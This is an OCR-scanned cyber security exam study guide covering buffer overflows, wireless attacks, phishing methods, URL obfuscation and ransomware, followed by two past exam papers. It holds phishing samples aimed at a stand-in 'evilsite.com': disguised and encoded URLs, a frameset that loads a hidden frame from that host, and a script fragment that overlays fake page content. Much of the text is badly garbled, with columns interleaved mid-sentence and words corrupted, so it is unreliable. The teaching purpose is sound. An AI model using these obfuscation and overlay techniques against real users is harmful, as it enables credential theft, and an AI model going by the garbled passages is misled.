a[30] s hs > ta pren Nal, then the buffer overflow occurred. A routine, 
} , er designe rifying that the source will fit into the destination or not, while 
Q.44. Explai ; which is ai a buffer, is vulnerable to exploit. 
-44. Explain the various types of buffer overflow, copying : racteristics of heap-based programming are — i 
Ans. Types of buffer overflow are as follows — qp (a) In a heap dynamic objects are allocated because it is a memory 
(i) Stack-based Buffer Overflow 
. — When on ce. i d ically new( ), calloc( ) and 
Fe ia fa amemo i i Program’ ape The functions allocated dynamically new( ), 
Mage De D Hom x in memory which is allocated by heap. 


ended data structure the heap use space 


usually a fixed length buffer, then stack buffer o 


D in k 2 : 
characteristics coos based programming are — verflow occurs, The odd (c) The variables which are declared dynamically are declared 
i (a) The memory space in whi F " before execution. ] . 
is known as stack. P ich automatic variables are allocated © °" pase allocated by the application at run-time on the heap is dynamic 


and normally contains program data. 
Q.45. Write down the techniques to minimize the buffer overflow. 
Ans. Since all the attacks cannot be prevented but there are some techniques 


(c) The reference to the variable i i 
. : in stack is removed hich can reduce these attacks — 
completion of function cycle. idi a (i) Assessment of Secure Code — We have read that when any 


To manipulate the program in various ways the attacker may exploit stack- ^ application tries to copy more data than it was designed to hold, then buffer 


m (b) Usually function 
initialized because they are allocated o 
by the system. 


parameters have garbage until 
the 
n the stack and not automatically iiaii 


TC ire d x overflow occurs. Programmers should have the knowledge to minimize the use 
TEN m A a variable may benefit the attacker, that is near the ^ of vulnerable C functions available in library, such as strcpy( ), strcat( ), sprintf( ), 
e stack. etc. which operate on null-terminated strings and perform no bounds checking. 

eant (b) Execution will resume at the return address as specified by (ii) Disable Stack Execution — Malicious code which reside in the 
attacker, once the function returns. stack, causes input argument to the program, it does not reside in the code 

(c) A function pointer which is to be executed. segment. A segmentation violation will be caused when any code attempts to 

. (ü) NOPs — An assembly language instruction/command that does execute the other code residing in the stack. The solution of this problem is to 
nothing is called no operation (NOP) or no operation performed (NOOP). invalidate the stack to execute any instructions. However, the solution is not 


State of status flags or memory locations in the code are not changed using “SY to implement, although it is possible in Linux. Trampoline functions are 
this command. By using NOP the developer can force memory alignment to USed by some compilers to implement taking the address of a nested function 
act as a place holder and later on to be replaced by an active instruction in that works on the system stack being executable. A trampoline is a small piece 
program development. of code created at run-time when the address of a nested function is taken. 
"m ivi the exact value of the instruction pointer is indeterminate, the NOP Trampoline requires the stack to be — € ee 
ide which was created by NOP opcode, allows . By increasin and in the stack frame of the containing function. 
the size of target stack buffer i the NOP nra 6 ipe aa : (iii) Compiler Tools - Since the arenis ane id 
address of buffer. The attackers can bad their code with NOP code to increase in optimization and the checks they perform, over the years, so they offer warnings 


the cha ; h as gets ), strcpy( ), etc. If such wami 
chance of finding the exact memory address. If it is done then a larger on the use of unsafe constructs SY be adviced to restructure the ae T 


section of stack is corrupted with th ^ : are displayed, then IS : 

NOP instructions, an un is ien s reri ario ex Z P peep ee Checks — enitn m to prevent attacks, 
top of the buffer where the shellcode (A all deii aue dedo ode àn application has res icted access- In this = Senta re pre oaded safety code is 
used as a payload in the exploitation of softy code is a small piece 0 digi ¢xeCuted before an application. A safer yer ^ icq standard function 
the end of attacker's supplied data. are vulnerability) is located, * can be provided by this preloaded code or it can be ensured by it, that no 


Teturn addresses are overwritten. 
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Q.46. What are wireless network atta 
of attacks on wireless networks. 


Ans. If anyone is talking about the wired 
wants to focus on one thing in both networks 
on a wired network are directly under control 
wired networks are assumed to be one of the tru: 
someone could sit around the network with a la 
network. Therefore wireless workstations are 
On the basis of this the administrators focu 
comes to guarding network security. Althou 
networks in compare to wired network. 

The unauthorized access of wireless network by penetratin 
is known as wireless cracking. The cracking of WLAN 
technological skills. There are various techniques to atta 
networks. Some of them are as follows — 

(i) Sniffing — It is the simplest attack among all attacks, 
data which is being broadcasted on an unsecured network c. 
intercepted using sniffing. The information about the active/available Wi-Fi 
networks gathered by a technique called reconnaissance. The Sniffers are 
remotely installed on victim's System and such activities are conducted — 

(a) Scanning of wireless networks 

(b) Detection of SSID 

(c) Collection of MAC address 

(d) Collection of frames to crack WEP. 

(ii) Spoofing — The main objective of thi 
advantage by changing/modifying the identi 
his/her data. The attacker simply create a new network with strong signals 
and often launches an attack on a wireless network by copying a SSID in the 
same manner as legitimate network. By doing so computers are connected to 
spoofed network instead of real. The computers need not to be informed to 
access the network while a wireless network is installed because as soon as 
they move within signal range they automatically access it, so the attackers 
can conduct this activity easily. 

Different types of spoofing are as follows — 


cks ? Explain the various , 

i €chnigue, 
and wireless networks 
I.€., trust (security de 
of administrator and the 
St. While in a Wireless hn 
Ptop and can access the vi 
assumed to be one Ofthe qi s 
s on both network uM 


Some wh 
gh they extremely focus on wireles 
s 


8 its securi 
s demand less 
Ck on wireless 


The Wireless 
an be easily 


s attack is to gain an illegal 
ty of legitimate user by falsifying 


(a) MAC Address Spoofing — Changing of an assigned media | 


access control (MAC) address of a networked device to another one, is known 
as MAC address spoofing. In this type of spoofing attackers can bypass the 
access control lists on servers or routers by either hiding a computer on a 
network or allowing it to impersonate another network device. 

(b) IP Spoofing — The process of creating IP packets with a 
IP address, so that identity of the sender is concealled, is known 
as IP spoofing. In this, a variety of techniques is used to find an IP address 
that is of trusted host. Now attacker modifies the packet headers so that it 


pe Y 


forged source 
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oming from the host that is legitimate. 
s are C 


i 802.11 standard 
— The frames valid as per a 
nan are injected by the attacker. Frames having 
ee pe detected easily unless the address is eame y 
enot authenticated in 802.11 networks nee 
i c 
: SR the Middle Attack (MITM)- Tei » ag xt 
oai ication between two hosts 1odify it. 
fr A oats inserts S between all communications asec 
ad the pede iie the knowledge of P and Q. Hence all messag 
ae sts P and 


Q but via S and vice versa. 
(iv) Encryption Cracking — 
is to use W 


obs 


quite easy for attack 
and important step 1 
much harder to crack. : " 
7. How can a wireless network be secured ? Exp € 
ps Th security features of wireless networks are still ci was ed 
nes Donee now they are not time-consuming and Voi «a i 
e em security of a wireless network can be improved by following step 
Mem (i) Enable your device with Ll encryption. 
ii fault SSID should be changei L : 
al es default settings of all the equipments/components of wireless 
ks should be changed. 
“er rm Filtering of MAC address should be = "-— 
(v) SSID of a wireless network should not be broa: g 
i in should be disabled. — 
db eeu aum be easily identified should not be provided 
did ne should connect our system only to secured id network. 
(ix) Firmware of a router cpm an cesi speed PM 
t can also t 
There are some tools F a - It is based on signature analysis and 
( i) ros tale ca wireless LANs is provided by this tool. It is 
advanced intrusion detec! on ' rotocol assessment policy deviation and 
also based on policy ad pare p 
‘thes UE 7 
ear ees cipit The Internet traffic is encrypted by Google 
(ii) Googi 


ogle's servers on the Internet. Anyone can go online 
Secure and sent through i name “Google Wi-Fi", which is secured by 
for free by accessing eire enabled device and à Google Account. 

Google's VPN, with you s Network Tool — lt is a freeware too] which 


333 áreles. ames 
ind Zeiten P detects all computer names, Mac and [p addresses 
maintain computer securi» 


(1 DD wE 


are 
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utilizing a single wireless network and helps to Protect a Wirel 
reveals all computers both authorized and unauthorized - di Sine Reto 
over the wireless network. © have i It 
Q.48. Discuss the phishing. Esg 
Or * Dec, 201 
Explain the term phishing in detail. (R.Gpy; 
Ans. Phishing, in its most common form, is the process ier N v. 
to a fake Website by clicking on a link. The Victim usually enc uring a 
in an e-mail message sent to him or on a Webpage being bro, Ounter, € link 
the following examples — Wsed by him ag i 
your $1 :000,000 Prize! 


(i) Click here www.luckyDraw. 
(ii) Urgent attention of all TrueBank Account Holde 
Following a security breach, we wish to inform all our exi ie 
that we need to verify their account details, Kindly click ere " 
www.Truebank.com 
to proceed. 
(iii) The ultimate experi 


ience with the hottest 
Click here for further details i 


www.HotBabesAndHunks.com 
Once the victim clicks on the li 


com to claim 


8 Customers 


abes in town. 


Own in fig. 5.6, pe 
ve information such as his credit card seem 
or a password. For example, one of the highly Publicized i 
times has been the phishing a 


T TrueBank" 


Dear customer 


This is to confirm that 


you have recently attempted to withdraw Rs.5000 
from your checking account while in another country. 


In case this information is incorrect, it is possible someone may have gained 
access to your account. To ensure s: 


afety of your account please visit our Website 
via the link given below to verify your personal information. 


J/w Www. 


cus 


We require your immediate cooperation to rectify this discrepancy. 


Thank you, 
TrueBank 


Fig. 5.6 An Example of a Phishing Attempt 
Phishing attempts often use URLs that are very similar to the real URL. 
For example, the real URL may be www.TrueBank.com but the fake one may 


T= 


ae 
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ds to a Website owned and 
fake URL correspon t r 

T gene eres the user clicks on the fake link, he/she is 

ur the attacker. e that has the same look and feel as that of the 

operie g with a y> ei n asked to enter his/her login name and password. 

presen I Website. He/she 1s ne he/she may be directed to the true site after 

i nea 5 ker has harvested sensitive 
a as pide password. But, by then, the attac 


eae like his/her password. 
inform 


i t methods of phishing. 
gm Mn lage Hein methods phishers employ are as follows — 
D e 
Ans. aig ersonation — Impersonation is the most popular agra 
0T. d of deceit. It consists of a completely constructed ake 
t simple meus: ived into visiting. This fake site contains images 
mos ecipient is deceived in i i 
ste thet ue Web site and might even be linked to the real site. 
from the E Forwarding — Forwarding is seen more with Amazon, eBay, 
iie d is an e-mail you typically receive that has all the usual real Web 
and PayPal aia logins within it. When a victim logs in via a Forwarding d 
site xen user's data is sent to the hostile server, then the user is forwarde 
mi a ite, and in many cases, the system logs you into the real site viaa 
P He remidi (MITM) technique. This Forwarding attack continuity is 
aha and victims usually never know that they were phished. The dirigat 
scd this approach is that it relies on the spam itself to get through wit ou 
Men filtered. Due to the amount of HTML within such an e-mail, many 
Ended antivirus and antispam filters will block it because the Bayesian 
beo rise with more encapsulated HTML. : " 
i (iii) Popups — The third basic method is the popup attack, a very 
i imited approach. The popup technique was first discovered during 
creative but limited app: unn 
the barrage of phishing attacks on Citibank in September rete ks inn ems E ly 
i i ithi i d it posted a hostile $ 
a link that you clicked within your e-mail, anı E 
behind the popup was the actual target that the attackers : Arie i eal 
data from. This is quite a slick, creative ploy that is actually 
i \ king of the three basic phishing methods. However, Popup attacks 
S la ae a today, since most browsers now have popup blockers installed 
by default (Mozilla/FireFox and Service Pack 2 for XP). 


Q.50. Explain the different types of phishing. (R.GPV., Nov. 2018) 
pa Numerous different types of phishing attacks have now been 
A listed below — 
" É the more prevalent are 
identified. Some of in-the-Middle Phishing — It is harder to detect than many 
GG) Man-in- In these attacks hackers position themselves between 
other forms of eens ate Website or system. They record the information 
the user and the legi tinue to pass it on so that users’ transactions are not 
being ies anes oh sell or use the information or credentials collected 
affected. er : - 
when the user is not active on the system 
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i] 
(ii) URL Obfuscation Attacks — The 
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Secret for many phi (d) Host Name ME ost news users are familiar 
is to get the message recipient to follow a hyperlink (URL) E VETE attang, eating tO sites and services using A y quali ied domain name, such 
server, without them realising that they have been duped. Unfortun; R cker, gn navi E ite.com. For a Web browser to communicate over the Internet, 
have access to an increasingly large arsenal of methods for n Phisherg wi : ww.evils' ust to be resolved to an IP address, such as 209.134.161.35 for 
final destination of the customer’s web request. Scating the ae dress m m. This resolution of IP address to host na 
The most common methods of URL obfuscation are — th evilsite.com- 
(a) Bad Domain Names — 


: me is achieved 
insi ww" p domain name Be A eias din o use the IP pie as 
ne of the mo: ivi ate the host and possibly bypass content ilteri 
methods is through the purposeful registration and use tbe! Obfuscation ae a URL tation from the end user. = 
Consider the financial institute MyBank with the registered domain main names, | stem „Or ide the following URL — 
and the associated customer transactional site http://privatebanking myb ankcom | For examp : Go m: ebanking @evilsite.com/phishing/fakepage.htm 
The phisher could set up a server using any of the following á Ybank co, b http://myba * Octaladdnesa expressed in base 8 
obfuscate the real destination host — ames to help a) 

(1) http://privatebanking.mybank.com.ch | 

(2) http://mybank.priv. 


(2) Hexadecimal-address expressed in base 16. 
atebanking.com 


These alternative formats are best explained using an example. Consider 
(3) http://privatebanking. mybout oT! | ne URL http://www.evilsite.com/, resolving to 210.134.161.35. This can be 
http://privatebanking. mybank.c < interpreted as — , š 
(4) http://privatebanking mybank hackproor interp (1) Decimal — bipnto 13461 35/ 
It is important to note that as domain registration organi. om (2) Dword — http://3532038435/ 
internationalize their services, it is Possible to register domai; quae aoe oe =, hitp//0522.0206.0241.0043/ 
languages and their specific character sets. For example, the € rui 1n other (4) Hexadecimal — http://0xD2.0x86.0xA 1.0x23/ or even 
identical to the standard ASCII “o” but can be used. for diff sid looks http://0xD286A 123/ 1 
registration Purposes - as pointed out by a company Whe cs domain (5) In some cases, it may be possible to mix formats (e.g., 
microsoft.com in Russia a few years ago. registered http://0322.0x86.161.0043/) 
Finally, it is worth noting that even the Standard ASCT 
an EA I 
allows for ambiguities such as upper-case “i” and lower-case aaa eet 


(e) URL Obfuscation — To ensure Support for local languages 
in Internet software such as Web browsers and e-mail d most d 
; i data. It is a trivial exercise for a 
— Many common web bro will support alternate encoding systems for : t à 
j s that can include authentication Phister tain fetal NTIRNETEMGES ot Rug Bd URL using oñs (o imix) f 
gin name and password. In general the f i these encoding schemes. 
URL://username:password@hostname/path. s HM These encoding schemes tend to be supported by most im d 
Phishers may substitute the username and Password fields for details associated ^ and can be interpreted in different ways by Web servers and their cu 
with the target organization. For example the following URL sets the username= applications. Typical encoding schemes are — oding, or sometimes 
mybank.com, password = ebanking and the destination hostname is evilsite.com. (1) Escape Encoding — ie pria an ting characters 
http://mybank. com:ebanking@evilsite. com/phishing/fakepage.htm | referred to as percent-encoding, is the accepted method ofrep tly interpreted. 
This friendly login URL can successfully trick many customers into thinking | within a URL that may need special syntax handling to pee sequence of 
that they are actually visiting the legitimate MyBank page. Because of its success, | This is achieved by encoding the character to bad ^ seii character “%” 
many current browser versions have dropped support for this URL encodingmethod. | three characters. This triplet icy iani n ries code ofthe original 
(c) Third-party Shortened URL’s — Due to the length and | followed by the two hexadecimal digits dad ME represents a space with 
complexity of many Web based application URLs — combined with the way | character. For example, te tet URL-encoded representation is %20. 
URL’s may be represented and displayed within various e-mail systems (e.g, | Octet code 32, or hexadecimal 20. Thus i L Unicode encoding is a method of 
extra spaces and line feeds into the URL) — third-party organizations have . (2) Unicode Encoding - t le bytes by providing a unique 
š " 2 3 , teferencing and storing characters with multiple byt latform. 
sprung up offering free services designed to provide shorter URL as d greco en te oe ee character no matter what the language ay d 
inati i ineering and deliberately broken longs P a : S) to encomp 
i bei s io an ers ien ovis 5i Ob Miseale iia destination. lt is designed to allow a Universal Character Set ae standards (such as 
incorrect S, Phishers may use these free services the world’s writing systems. Many modern communic? ^ "c Web clients 
Common free services include http://smallurl.com and http://tinyurl.com. XML, Java, LDAP. JavaScript, WML, etc.), operating systems ° 


——&£4&+é+& 
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Servers use Unicode character values. Uni 
character encoding that contains all of th 


s l e characters (216 = ae Sa 164i 
in common use in the world’s Major lan " 3 iffere 
Windows platforms allow for encoding of Unicode Charact, e ictosos x 
format —4u0000 — for example %u0020 represents a Space m th ol owine 
represents the accented AE and %uFD3F is an ornate right ahile UDIRE 
(3) Inappropriate UTF-8 Encodin thesis 
commonly utilised formats, Unicode UTF-8 has the Characteri. a Of th most 
the full US-ASCII character range. This great flexibilit wi Of pres Tvin; 
Opportunities for disguising standard characters in ER “Ovide man 
Sequences. For example, the full Stop character “ » ay be CaDe-enco 
%2E, or %CO%AE, or %E0%80%AE, or "eF0* 48094809, aÈ Tepresented 
80% 80%AE, or even %FX%80%80%80%80%AE Saadon xy 
(4) Multiple Encoding -= 
carefully explain t 


> many appli 
encoded data multiple times 
Consequently, phi 
encoding character: 
the back-slash “\” 


Frames are a popular method of hiding 
due to their uniform b 


or something more nefarious; such as 
executing Screen-grabbing and key-logging observation code. 


*" framespacing="0"> L 
real" src-"http://mybank.com/" scrolling-"auto'^ 
«frame name-"hiddenContent" Src-"http://evilsite.com/bad.htm 
scrolling = “auto” 

</frameset> 
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t — Several methods exist for 
Lhe Page Conten 
overriding 


f the most popular methods of 
bears ed content. One o b 
to override € a page is to use the DHTML Haba: DIV. M 
shers fake content WI ttacker to place content into a “virtual container" that, 
funcion allows an osition and size through the STYLE method, can be 
m n an absolute irn (by "sitting on top") underlying content. This 
Pd to hide or rep delivered as a very long URL or by referencing a 
Jicious content may a res following code segment contains the first three 
mal script. For example, j iting a pages content. 
stored al JavaScript file (e.g., fake.js) for overwriting a pag 
tines © a ument; ", itinn: " . " " hoe 
vat DIV id="fake" style="position:absolute; left:200; top:200; z 
. p , = ls ae 4><TR>): 
ndex:2'7 idth=500 height=1000 cellspacing=0 cellpadding=1 >) 
AN cuit bgcolor=#FFFFFF valign=top height=125> jE 
d.wrt 


is method allows an attacker to build a complete page (including graphics 
ba scripting code elements) on top of the real page. : 
sue (c) Graphical Substitution — While it is possible to overwrite 
ontent easily through multiple methods, one problem facing phishers is 
a " browser specific visual clues to the source of an attack. These clues 
i na the URL presented within the browsers URL field, the secure padlock 
em roasting an HTTPS encrypted connection, and the Zone of the page source. 
T oumon method used to overcome these visual clues is through the use of 
browser scripting languages (such as JavaScript, VBScript and Java) to position 
specially created graphics over these key areas with fake information, 


(iv) Client-side Vulnerabilities — The sophisticated browsers 
customers use to surf the web, just like any other commercial piece of software, 
are often vulnerable to a myriad of attacks. The more functionality as cie 
the browser, the more likely their exists a vulnerability that could be 2 wise 
byan attacker to gain access to, or otherwise observe, confidential informa 

of the customer. 


While software vendors have made great strides in methods of dura ES 
Software updates and patches, home users are notoriously poor n ss is 
them. This, combined with the ability to install add-ons Ta ses inf 
RealPlayer and other embedded applications) means that the 
Opportunities for attack. — omated 
È Similar to the threat posed by some of the nastier en ae ek 

Worms, these vulnerabilities can be exploited in a =. stopped by anti- 
unlike worms and viruses, many of the attacks ae ae consequently 
Virus software as they are often much harder a? i triggered, is usually 
Prevent (i.e., the stage in which the antivirus een tries to install a W ell 
after the exploitation and typically only if the a 

known Backdoor Trojan or Key-logger utility). 


a 
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124 Cyber Decejitie Phishing — The term "phishing" ori å 
(v) s instant messaging but the most common 

account thet ni e-mail message. Messages about the Need to Veri 
today is a decep failure requiring users to re-enter their informa jon oe 
information, SYS! ndesirable account changes, new free Services n e, 
account En roit scams are broadcast to à wide group of 
action, and pend unwary will respond by clicking a link to OF sign: i 
he nop ee their confidential information can be Collected, oa toa 
bogus site i Malware-based Phishing — lt refers to scams that iny if 

B sis on users' PCs. Malware can be introduceg fa C Tunning | 
erae as a downloadable file from a Web site, or p 
attac > 


an e, ! 

: Y €xploiting "ai 

ity vulnerabilities — a particular issue for small and mg know 
securi 


keep their softw sien Dine, 
(SMBs) who are not always able to keep 9ttware applications NN 


(vii) DNS-Based Phishing (“Pharming”) d Pharming le. 
given to hosts file modification or Domain Name System (DNS)-based hint 
With a pharming scheme, hackers tamper with a company’s hosts fiet 
domain name system so that requests for URLs or Name service Tetum 
bogus address and subsequent communications are directed toa fake gi : 
The result — users are unaware that the Website where they are cite 
confidential information is controlled by hackers and is Probably not Ly 
the same country as the legitimate Website. 


a] 
y 
broadg, fe 


(viii) Content-Injection Phishing — It describes the situation Where 
hackers replace part of the content of a legitimate Site with false Content 
designed to mislead or misdirect the user into giving up their confidential 
information to the hacker. For example, hackers may insert malicious code to 
log user’s credentials or an overlay which can secretly collect information and 
deliver it to the hacker’s phishing server. 


(ix) Search Engine Phishing — It occurs when 


phishers create Web 
sites with attractive (often too attractive) sounding offers 


and have them indexed 


ino, uid 


Ven in 


legitimately with search engines. Users find the sites in the normal course of | 


searching for products or services and are fooled into giving up their 
information. For example, scammers have set up false banking sites offering 
lower credit costs or better interest rates than other banks. Victims who use 
these sites to save or make more from interest charges are encouraged to 
transfer existing accounts and deceived into giving up their details. 


Q.51. Write short note on Man-in-the-middle-attack. 


(R.GP.V., Dec. 2010, June 2011) 
Ans. Refer to Q.50 (i). 


Q.52. Write short note on deceptive phishing. 


(R.GP.V., Dec. 2010, June 201!) 
Ans. Refer to Q.50 (v). 
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phishing and ransomware attacks, 


(R.GP. V, Dec, 2017) 


3, Explain Man-in-middle, 
p^ 
ing — Refer to Q.48. 
ishing i 
Ans, PR dle — Refer to Q.50 (i). 
Manin re — Ransomware is a type of malwar 
R ee the some important files and then bl 
^ ck the files. Wannacry is an example of rango, 
ie and immediately spread via its network. 
ae PDF file, word documents and other files 
w $ 
s or through infected PC. 
ema 


Q5 4. What is phishing ? Explain DNS-based Phishing, 


€. The developer of 
ackmail the Owner of. 
mware which infected 
Ransomware generally 
which are Sentthrough 


unb 


. (R.GPY, p 
Ans, Refer to QA48 and Q.50 (vii). ibd 


t you can do to avoid phishing attacks ? 
0.55. What y Or 
Write about offering phishing prevention techniques, 


, : (RGR, June 2016) 
Ans. The good news is there are things you can do to steer clear of 
hishing attacks and phishing sites — 
p (i) Be Careful about Responding to e-mails that ask you for 
Sensitive Information — You should be wary of Clicking on links in e-mails or 
responding to emails that are asking for things like account numbers, user 
names and passwords, or other personal information such as social security 
numbers. Most legitimate businesses will never ask for this information via c- 
mail. Google does not. 


(ii) Go to the Site Yourself, Rather than Clicking on Links in 
Suspicious e-mails — If you receive a communication asking for sensitive 
information but think it could be legitimate, open a new browser window and 
go to the organization's Website as you normally would (for instance, by 
using a bookmark or by typing out the address of the organization's Website). 
This will improve the chances that you are dealing with the organization's 
Website rather than with a phisher's Website, and if there's actually something 
you need to do, there will usually be a notification on the site. Also, if you're 


| not sure about a request you have received, do not be afraid to contact the 


organization directly to ask. It takes just a few minutes to go to the organization's 

Website, find an e-mail address or phone number for customer support, and 

reach out to confirm whether the request is legitimate. 

(iii) If You are on a Site that’s Asking you to Enter Sensitive 
Information, Check for Signs of anything Suspicious — If you are on a site 
that’s asking for sensitive information — no matter how you got there — check 
for the signs that it's really the official Website for the organization. For example, 
check the URL to make sure the page is actually part of the organization’s 
Website, and nota fraudulent page on a different domain (such as mybankk.com 
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" vou re on a page that should be secured (like one agp; 
" qase ih eredi ed cuoc look for "https" at the beginn È 
d pend and the padlock icon in the browser. (In Firefox and inteme, | 
alone 6, the padlock appears in the bottom Pme Corner, While in | 
Internet Explorer 7 the padlock appears on the right- p side of the Address | 
bar.) These signs are not infallible, but they are a goo P ace to start. 
(iv) Be Wary of the “Fabulous Offers” and Fantastic Prizes” that x 
You will Sometimes come Across on the Web -If something seems too good tg — 
be true, it probably is, and it could be a phisher trying to steal your information, 
Whenever you come across an offer online that requires you to share personal or | 
other sensitive information to take advantage of it, be sure to ask lots of questions 
and check the site asking for your information for signs of anything Suspicious 
(v) Use of Browser that has a Phishing Filter — The latest Versions 
of most browsers include phishing filters that can help you spot Potentia] | 
phishing attacks. 

56. What are security threats ? 

Ans. Within the framework of cyber security, the t 
potential dangers that can harm the fi 
your systems or your networks. As the 
more heavily each day, the types and s 


(R.GP.V, Noy, 2019) 
uri erm threat refers to the 
les within your Systems, operations of 
businesses are depending on the digital 


cope of cyber security threats constantly 
change and evolve. There are several major categories of cyber Security threats 


such as Ransom ware, malware, social engineering and phishing. 


l (i) Ransom ware is a type of malware that involves an attacker 
locking the victim’s computer system files t 


ypically through encryption and 
demanding a payment to decrypt and unlock them. 


(ii) Malware is any file or program used to harm a computer user, 
such as worms, computer viruses, Trojan horses and spyware. 


ITI 


Fig. 5.7 Cybersecurity Threats 


(ili) Social engineering is an attack that relies on human interaction 


to trick users into breaking security procedures in order to gain sensitive 
information that is typically protected. 


(iv) Phishing is a form of fraud where fraudulent e-mails are sent 
that resemble emails from reputable sources; however, the intention of these 
e-mails is to steal sensitive data, such as credit card or login information. 
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CS-5005 (2) (CBGS) 
B.E. (Fifth Semester) EXAMINATION, Nov. 2018 
Choice Based Grading System (CBGS) 
CYBER SECURITY 


Note- (i) Attempt any five questions. 
(ii) All questions carry equal marks. 
1. (a) Define the term cyber crime. Give the classification of Cyber crime. 
(See Unit-I, Page 4, Q.3) 
(b) What can a person do to protect himself/herself from identity theft ? 
(See Unit-II, Page 34, Q.24) 
2. (a) What are the problems may be generate due session hijacking ? 
(b) Define the term cyber stalking. How can we tackle this Cyber crime? 
(See Unit-I, Page 9, Q.9) 
3. (a) How can we check the validity of digital evidence ? 
(See Unit-IV, Page 85, Q.22) 
(b) What is the Salami attack ? How information can be gathered through 
Salami technique ? (See Unit-I, Page 11, Q.12) 
4. (a) Explain the different types of phishing. (See Unit-V, Page 119, Q.50) 
(b) What is the role of digital signature in digital evidence ? 
(See Unit-IV, Page 85, Q.21) 
5. (a) How DoS and DDoS attacks can be performed ? 


(See Unit-V, Page 112, Q.41) 
(b) What is IT Act 2000 ? Write the silent features of IT Act 2000. 


(See Unit-III, Page 50, Q.2) 
6. (a) What is computer virus ? How the virus spread ? How to protect 
against virus ? (See Unit-V, Page 97, Q.19) 


(b) How Trojan horses affect the computer system/network ? 
(See Unit-V, Page 103, Q.27) 
7. (a) Whatis anonymizers ? How anonymizers work ? 
(See Unit-V, Page 88, Q.2) 
(b) What is the cyber terrorism ? Discuss in detail. 
(See Unit-II, Page 39, Q.28) 
8. Write the short notes on — 


(a) E-mail spoofing (See Unit-I, Page 6, Q.5) 
(b) Software piracy (See Unit-II, Page 19, Q.4) 
(c) Password sniffing (See Unit-II, Page 31, Q.21) 


(d) Key loggers, (See Unit-V, Page 89, Q.5) 
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CS-503 (C) (CBGS) 
B. Tech (Fifth Semester) 
EXAMINATION, Nov, 2019 
Choice Based Grading System (CBGS) 
CYBER SECURITY 


Note- (i) Attempt any five questions. 
(ii) All questions carry equal marks. 
(iii) All parts of each questions are to be attempted at one lisi 
1. (a) What do you mean by IP spoofing ? (See Unit-1, Page 6, 08)7 


(b) What is computer virus ? How the virus spread ? 7 
(See Unit-V, Page 94, Q.11) 


2. (a) Discuss the components of digital signature. ; 
(See Unit-IV, Page 75, Q.11) 

(b) Explain intellectual property right with suitable example. 7 
(See Unit-III, Page 64, Q.20) 

3. (a) How can we check the validity of digital evidence ? 7 


(See Unit-IV, Page 85, Q.22) 


(b) Define the term cyber stalking. How can we tackle this cyber crime ? 
(See Unit-I, Page 9, Q.9) 7 


4. (a) What do you mean by session hijacking ? (See Unit-II, Page 46, Q.36) 7 


(b) What are the various challenges of cyber crime ? 1 
(See Unit-I, Page 4, Q2) 

5. (a) What are security threats ? (See Unit-V, Page 126, Q.56) 7 
(b) Explain the term phishing in detail. (See Unit-V, Page 118, Q.48) 7 

6. (a) Explain the term copyright act and patent law. 7 
(See Unit-III, Page 65, Q.21) 

(b) Discuss the concept of intrusion detection system. 7 
(See Unit-II, Page 21, Q9) 


7. (a) What do you mean by software piracy ?(See Unit-II, Page 19, Q47 
(b) Why we need cyber security explain ? (See Unit-III, Page 52,Q.5)7 
8. Write down short notes on any three — 14 


(a) Backdoor (See Unit-V, Page 106, Q.31) 
(b) Logic bomb (See Unit-V, Page 107, Q.32) 
(c) Worm (See Unit-V, Page 98, 0.20) 
(d) Spyware (See Unit-V, Page 90, Q- 


(e) Firewalls. (See Unit-V, Page 107, Q.33 
et 


